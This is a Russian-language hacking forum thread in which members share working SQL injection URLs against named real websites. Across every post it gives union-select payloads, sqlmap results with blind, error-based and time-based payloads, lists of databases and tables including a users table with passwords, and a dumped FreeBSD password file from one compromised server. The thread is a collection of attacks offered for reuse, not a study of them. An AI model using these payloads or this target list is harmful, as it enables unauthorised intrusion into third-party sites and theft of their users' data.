16.04.2016, 11:05
|
|
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами:
6747446
Репутация:
32
|
|
Код:
_ttp://taxiforsazh.ru/news.php?id=-1%27+union+select+1,@@version,3,4+--+
5.1.71-cll-lve |
|
|
21.04.2016, 17:10
|
|
Новичок
Регистрация: 24.07.2011
Сообщений: 23
С нами:
7791446
Репутация:
10
|
|
Код:
http://relax-nk.ru/rub.php?id=1 union all select @@version,2
5.5.47
http://janno.net/shop_.php?id=-1 union all select 1,@@version,3,4,5,6
5.5.48-cll 3
http://www.flundra.com/shop2.php?id=-1 union all select 1,2,@@version,4,5,6,7,8
5.5.29-log
www.powermanager.co.kr/bbs/shop_.php?cno=2
---
Parameter: cno (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cno=2) AND 2160=2160 AND (1973=1973
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cno=2) AND (SELECT * FROM (SELECT(SLEEP(5)))doLu) AND (4537=4537
---
web application technology: PHP 5.3.13
back-end DBMS: MySQL 5.0.12
Database: powermgcok
http://www.suriyanar.com/pay.php?Id=-1 union all select 1,@@version,3,4,5
5.1.73-cll
http://www.vidspoke.com/buy.php?id=-1+union+all+select(select+concat(ifnull(version(),char(32)))+)
5.5.45-cll-lve
http://depolamp.ru/buy.php?id=-1 union all select 1,@@version,3,4,5,6,7,8,9
5.1.73
http://www.zeogames.net/game.php?id=6
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 7494=7494
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=6 AND (SELECT * FROM (SELECT(SLEEP(5)))CLTv)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
|
|
|
|
22.04.2016, 15:40
|
|
Новичок
Регистрация: 24.07.2011
Сообщений: 23
С нами:
7791446
Репутация:
10
|
|
Код:
http://www.slavsandtatars.com/about.php?id=-1 union all select version(),2,3
5.0.96-log
http://som.adzu.edu.ph/newsupdates/index.php?id=-1 union all select 1,version(),3,4,5,6
10.1.13-MariaDB
http://www.nbrri.gov.ng/sites/news.php?ID=2
---
Parameter: ID (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
clause
Payload: ID=2 RLIKE (SELECT (CASE WHEN (3724=3724) THEN 2 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (EXTRACTVALUE)
Payload: ID=2 AND EXTRACTVALUE(5424,CONCAT(0x5c,0x7162627871,(SELECT (ELT(54
24=5424,1))),0x716b707871))
Type: AND/OR time-based blind
Title: MySQL = 5.0.12 AND time-based blind (SELECT)
Payload: id=2' AND (SELECT * FROM (SELECT(SLEEP(5)))PeRi) AND 'kKhu'='kKhu
---
back-end DBMS: MySQL 5.0.12
http://www.putridflowers.com/music.php?id=(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
5.5.43-37.2-log
|
|
|
|
24.04.2016, 14:10
|
|
Новичок
Регистрация: 24.07.2011
Сообщений: 23
С нами:
7791446
Репутация:
10
|
|
Код:
http://www.component-asu.ru/catalog.php?tp=1' union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -
5.5.34-32.0-log
=================================================================================================================
https://www.fairradio.com/catalog.php?mode=view&categoryid=214
---
Parameter: categoryid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mode=view&categoryid=214') AND 9239=9239 AND ('bsAX'='bsAX
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: mode=view&categoryid=214') AND (SELECT * FROM (SELECT(SLEEP(5)))Ximv) AND ('zqOE'='zqOE
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
available databases [2]:[*] fairrad_radio[*] information_schema
=================================================================================================================
http://www.dataapex.com/catalog.php?catCategory=1
---
Parameter: catCategory (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: catCategory=1 AND (SELECT * FROM (SELECT(SLEEP(5)))MTXx)
---
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.45, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
=================================================================================================================
http://dnepr-auto.dp.ua/catalog.php?id=1'+and(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1
5.5.41-0+wheezy1
+ XSS
=================================================================================================================
http://jewelfox.ru/catalog.php?catId=ard
---
Parameter: catId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catId=ard' AND 5559=5559 AND 'QhzR'='QhzR
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: catId=ard' AND (SELECT * FROM (SELECT(SLEEP(5)))Jqzn) AND 'dkLD'='dkLD
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.12
Database: jewelfo9_db73544m
[32 tables]
+-------------------+
| arrival_list |
| arrival_list_lot |
| basket |
| box |
| business |
| category |
| defect |
| delivery |
| favorites |
| logistics |
| lots |
| motion |
| motion_logistics |
| motion_lot |
| order_tao |
| order_tao_comment |
| order_tao_lots |
| orders |
| partCategory |
| payment |
| privilege |
| purchase |
| recovery |
| requirement |
| role |
| role_privilege |
| store |
| store_location |
| topMenu |
| user_location |
| user_role |
| users |
+-------------------+
=================================================================================================================
http://www.int.nsk.su/tech.php?id=1 union all select 1,user(),version(),4,5,database()
logosolinf_hleb 5.6.28-76.1-log logosolinf_hleb@localhost
=================================================================================================================
http://www.sinoshop.ru/catalog.php?pid=1 union all select 1,2,version(),4,5,6,7,8,9
4.0.24_Debian-10sarge3-log
|
|
|
|
26.04.2016, 11:39
|
|
Познающий
Регистрация: 31.07.2015
Сообщений: 41
С нами:
5677526
Репутация:
1
|
|
Код:
http://tvoy-soblazn.ru/catalog.php?cat=9&sid=120&sid=-118+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,version(),54,55,56,57,database(),59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74--
rentaproject_szn
5.0.82-log 7
|
|
|
|
01.05.2016, 00:12
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами:
6868406
Репутация:
2
|
|
Код:
http://www.dealigg.com/index.php?page=2&category=ApparelShoes (GET)
Parameter: category (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=2&category=ApparelShoes' AND 9810=9810 AND 'aHPZ'='aHPZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: page=2&category=ApparelShoes' AND (SELECT 9690 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (ELT(9690=9690,1))),0x71706a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rueO'='rueO
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: page=2&category=ApparelShoes' OR SLEEP(5) AND 'YOBs'='YOBs
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: page=2&category=-4553' UNION ALL SELECT CONCAT(0x716a716b71,0x786943664e5a70716c6e7a71727a774b55506a74774f78446271567a747359757950414548467768,0x71706a7171)-- -
---
web application technology: PHP 5.4.16
back-end DBMS: MySQL 5.0
available databases [3]:[*] dealdb[*] information_schema[*] test
А то все мелочь и мелочь!
 |
|
|
|
01.05.2016, 00:21
|
|
Участник форума
Регистрация: 20.04.2016
Сообщений: 185
С нами:
5297366
Репутация:
47
|
|
RWD, раскручивайте вручную.
Код:
http://www.dealigg.com/index.php?page=2&category=-ApparelShoes'+and+extractvalue(1,concat(0x3a,(user())))+--+
|
|
|
|
15.08.2016, 02:01
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами:
6868406
Репутация:
2
|
|
Current User: root@localhost
Код:
http://www.lafinancepourtous.com/quiz/admin/xml.php?id=2 (GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 2870=2870
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a707671,(SELECT (ELT(1622=1622,1))),0x717a706a71,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=2 AND SLEEP(5)
---
web application technology: Apache
back-end DBMS: MySQL >= 5.5
Current DB: lafinancepourtousquiz
Data Base Found: information_schema
Data Base Found: grand_quiz
Data Base Found: lafinancepourtous
Data Base Found: lafinancepourtousgame
Data Base Found: lafinancepourtousquiz
Data Base Found: mysql
Data Base Found: performance_schema
Data Base Found: phpmyadmin
Data Base Found: portail
Data Base Found: preprod
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
mysql:*:88:88:MySQL Daemon:/home/mysql:/usr/sbin/nologin
admin:*:1001:1001:User &:/home/admin:/bin/sh
pgsql:*:70:70:PostgreSQL Daemon:/usr/local/pgsql/pgsql:/bin/sh
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
vscan:*:110:110:Scanning Virus Account:/var/amavis:/bin/sh
dovecot:*:143:143:Dovecot User:/var/empty:/usr/sbin/nologin
cyrus:*:60:60:the cyrus mail server:/nonexistent:/usr/sbin/nologin
mailowner:*:1003:1003:User &:/home/mailowner:/usr/sbin/nologin
webapps:*:1004:1004:User &:/home/webapps:/sbin/nologin
mailman:*:91:91:Mailman Owner:/home/mailman:/sbin/nologin
nfrance:*:1006:1006:User &:/home/nfrance:/bin/sh
mrtg:*:279:1001:MRTG daemon:/nonexistent:/sbin/nologin
stats:*:1008:1009:User &:/home/stats:/sbin/nologin
nagios:*:181:181:Nagios pseudo-user:/var/spool/nagios:/sbin/nologin
dovenull:*:144:144:Dovecot login User:/var/empty:/usr/sbin/nologin
iefp2:*:1009:1010:utilisateur:/home/users/iefp2:/bin/ftponly
iefp3:*:1010:1011:utilisateur:/home/users/iefp3:/usr/local/bin/bash
mail1001:*:1011:1012:utilisateur:/home/users/mail1001:/usr/sbin/nologin
mail1005:*:1012:1013:utilisateur:/home/users/mail1005:/usr/sbin/nologin
mail1010:*:1013:1014:utilisateur:/home/users/mail1010:/usr/sbin/nologin
mail1015:*:1014:1015:utilisateur:/home/users/mail1015:/usr/sbin/nologin
mail1018:*:1016:1017:utilisateur:/home/users/mail1018:/usr/sbin/nologin
mail1020:*:1017:1018:utilisateur:/home/users/mail1020:/usr/sbin/nologin
mail1024:*:1018:1019:utilisateur:/home/users/mail1024:/usr/sbin/nologin
mail1026:*:1019:1020:utilisateur:/home/users/mail1026:/usr/sbin/nologin
mail1022:*:1020:1021:utilisateur:/home/users/mail1022:/usr/sbin/nologin
mail1029:*:1021:1022:utilisateur:/home/users/mail1029:/usr/sbin/nologin
mail1017:*:1022:1023:utilisateur:/home/users/mail1017:/usr/sbin/nologin
mail1025:*:1023:1024:utilisateur:/home/users/mail1025:/usr/sbin/nologin
mail1006:*:1024:1025:utilisateur:/home/users/mail1006:/usr/sbin/nologin
mail1003:*:1025:1026:utilisateur:/home/users/mail1003:/usr/sbin/nologin
mail1012:*:1026:1027:utilisateur:/home/users/mail1012:/usr/sbin/nologin
mail1027:*:1027:1028:utilisateur:/home/users/mail1027:/usr/sbin/nologin
mail1028:*:1028:1029:utilisateur:/home/users/mail1028:/usr/sbin/nologin
mail1002:*:1029:1030:utilisateur:/home/users/mail1002:/usr/sbin/nologin
mail1019:*:1030:1031:utilisateur:/home/users/mail1019:/usr/sbin/nologin
mail1030:*:1031:1032:utilisateur:/home/users/mail1030:/usr/sbin/nologin
mail1031:*:1032:1033:utilisateur:/home/users/mail1031:/usr/sbin/nologin
vnstat:*:284:284:vnStat Network Monitor:/nonexistent:/usr/sbin/nologin
current user: 'atame_@localhost'
Код:
http://lacuerda.net:80/Enlaces/index.php?cid=9 (GET)
Parameter: cid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=9 AND 7978=7978
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cid=9 AND (SELECT 2945 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(2945=2945,1))),0x716a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cid=9 AND SLEEP(5)
---
web application technology: Apache, PHP 5.4.42
back-end DBMS: MySQL >= 5.0
available databases [4]:[*] information_schema[*] lc_comunidad[*] lc_dbase[*] lc_topsites
Код:
http://www.owk.cz:80/philosophy-operation/whoweare/subject.php?id=1 (GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5266=5266
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.12
|
|
|
|
15.08.2016, 19:44
|
|
Новичок
Регистрация: 14.08.2016
Сообщений: 17
С нами:
5130326
Репутация:
0
|
|
Код:
http://www.dalnoboivideo.ru/page.php?id=-118'+union+select+1,version(),3,4+--+
версия: 5.6.28-1+wheezy1+mh2-log
таблицы: adv,adv_places,pages,places,users,videos
поля users: id,login,password,city,mail,ip,date_reg,priv
админки не нашел и все что с этим связанно.(((( |
|
|
|
18.08.2016, 22:05
|
|
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами:
6747446
Репутация:
32
|
|
Код:
http://www.bogatiyhohol.ru/news.php?id=-1%27+union+select+1,@@version,3,4+--+
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
